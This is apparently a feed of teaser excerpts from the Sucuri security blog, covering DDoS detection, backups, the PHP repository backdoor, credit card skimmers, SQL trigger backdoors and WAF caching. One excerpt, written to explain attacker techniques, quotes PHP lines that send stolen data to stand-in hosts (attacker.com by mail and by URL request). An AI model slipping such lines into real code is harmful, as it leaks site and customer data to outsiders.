How to Know If You Are Under DDoS Attack

http://feedproxy.google.com/~r/sucuri/blog/~3/3kI_jcIxuxw/how-to-know-if-you-are-under-a-ddos-attack.html

Nowadays, the term DDoS probably raises the heart rate of most webmasters. Though many don’t know exactly what a DDoS attack is, they do know the effect: an extremely sluggish or shut-down website. In this article, we’ll focus on how to know if your website is under attack and how to protect it. Hopefully, we can help you handle DDoS attacks without having a full-blown meltdown.

What is a DDoS Attack?

Continue reading How to Know If You Are Under DDoS Attack at Sucuri Blog.

The Importance of Website Backups

http://feedproxy.google.com/~r/sucuri/blog/~3/giM3k7q8ZZ0/the-importance-of-website-backups.html

Today is World Backup Day. This date was created to remind people of the importance of having backups set up for everything that matters. I am pretty sure your website falls into the category of precious digital assets.

Why are website backups important?

Imagine waking up in the morning to see that a couple of calls were missed and your email is overloaded with messages saying that your website is down. You go to your computer to check your server and it’s working fine – but oh no, all your files are deleted from the database. Continue reading The Importance of Website Backups at Sucuri Blog.

PHP Repository Exploited by Hackers

http://feedproxy.google.com/~r/sucuri/blog/~3/9GyiBNhWczQ/php-repository-exploited-by-hackers.html

The official PHP git repository, http://git.php.net/, was compromised this Sunday, March 28. An attacker was able to modify the PHP source code twice and inject a backdoor into it. Thankfully, both attempts were quickly detected and removed by the PHP team. Per a statement released in PHP’s internal mailing list, the current investigation believes the git.php.net server itself has been compromised rather than the individual’s account. Everything points towards a compromise of the git.php.net server. Continue reading PHP Repository Exploited by Hackers at Sucuri Blog.

How Do Websites Get Hacked?

http://feedproxy.google.com/~r/sucuri/blog/~3/Bq1525bttf4/how-do-websites-get-hacked.html

As much as the web has grown, surprisingly not a lot has changed in how websites get hacked. The most important thing you can do in keeping the web – and your own sites and visitors – safe is to understand these unchanging truths and hold them close to heart.

Consider the Scale of Hacked Websites

1.2 billion sites make up today’s World Wide Web. Assuming a 3-second load time, continuous queries, and not a wink of rest, it’d take you over 160 years to just see every site that currently exists. Continue reading How Do Websites Get Hacked? at […]

Server Side Data Exfiltration via Telegram API

http://feedproxy.google.com/~r/sucuri/blog/~3/ToSI--EOfuM/server-side-data-exfiltration-via-telegram-api.html

One of the themes commonly highlighted on this blog includes the many creative methods and techniques attackers employ to steal data from compromised websites. Credit card skimmers, credential and password hijackers, SQL injections, and even malware on the server level can be used for data exfiltration. What’s more, attackers may be able to accomplish this feat with a few mere lines of code. For example:

Emailing the data: @mail("email@attacker.com", $_SERVER["SERVER_NAME"], $stolenData);

Writing the data to a local file: fwrite($fh, $stolenData);

Sending the data to a remote URL under the attacker’s control: @file_get_contents("http://attacker.com/cgi-bin/optimus.pl?prime=$stolenData");

Writing the data to an image file within […]

Magento 2 PHP Credit Card Skimmer Saves to JPG

http://feedproxy.google.com/~r/sucuri/blog/~3/pyFI2EIUYFo/magento-2-php-credit-card-skimmer-saves-to-jpg.html

Bad actors often leverage creative techniques to conceal malicious behaviour and harvest sensitive information from ecommerce websites. A recent investigation of a compromised Magento 2 website revealed a malicious injection that was capturing POST request data from site visitors. Located on the checkout page, it was found to encode captured data before saving it to a .JPG file.

Malicious Injection Behavior

The following PHP code was found injected into the file ./vendor/magento/module-customer/Model/Session.php. Continue reading Magento 2 PHP Credit Card Skimmer Saves to JPG at Sucuri Blog.

Trojan Spyware and BEC Attacks

http://feedproxy.google.com/~r/sucuri/blog/~3/7CWjK9uypZA/trojan-spyware-and-bec-attacks.html

When it comes to an organization’s security, business email compromise (BEC) attacks are a big problem. One primary reason impacts are so significant is that attacks often use a human victim to authorize a fraudulent transaction to bypass existing security controls that would normally be used to prevent fraud. Another reason is that social engineering lures may be expertly crafted by the attacker after they have been monitoring a victim’s activity for some time, resulting in more effective phishing campaigns with serious security implications. Continue reading Trojan Spyware and BEC Attacks at Sucuri Blog.

SQL Triggers in Website Backdoors

http://feedproxy.google.com/~r/sucuri/blog/~3/YO_WM-0196E/sql-triggers-in-website-backdoors.html

Over the past year, there’s been an increasing trend of WordPress malware using SQL triggers to hide malicious SQL queries within compromised databases. These queries inject an admin level user into the infected database whenever the trigger condition is met. What makes this especially problematic for website owners is that most malware cleanup guides focus on the website files and data within specific database tables — for example, wp_users, wp_options, and wp_posts. Continue reading SQL Triggers in Website Backdoors at Sucuri Blog.

UCEPROTECT: When RBLs Go Bad

http://feedproxy.google.com/~r/sucuri/blog/~3/1JyimLhEc7A/uceprotect-when-rbls-go-bad.html

Realtime Blackhole Lists (RBLs) can be a great tool in your security arsenal. You may not know you’re using them, but all email providers and company email servers leverage these services to check the servers and IP addresses sending mail against a known list of offenders that send spam or other abusive content. These services use a number of methods to compile lists of IP addresses reputed to send spam, mostly populating them with honeypots that use “poison” email addresses as bait to act as victims. Continue reading UCEPROTECT: When RBLs Go Bad at Sucuri Blog.

Optimizing Performance and Behavior with WordPress and the Sucuri WAF

http://feedproxy.google.com/~r/sucuri/blog/~3/2rl9l8_5oEA/optimizing-performance-and-behavior-with-wordpress-and-the-sucuri-waf.html

Aside from providing significant protection from a wide range of threats, the Sucuri WAF also acts as a CDN due to its caching capabilities and regional PoPs — often performing even better than dedicated CDNs based on recent tests. CDNs can significantly help speed up your website by storing and delivering content as close to the browser as possible, using servers dedicated to that task. What’s more, properly configured caching settings are the best defense against DDoS attacks. Continue reading Optimizing Performance and Behavior with WordPress and the Sucuri WAF at Sucuri Blog.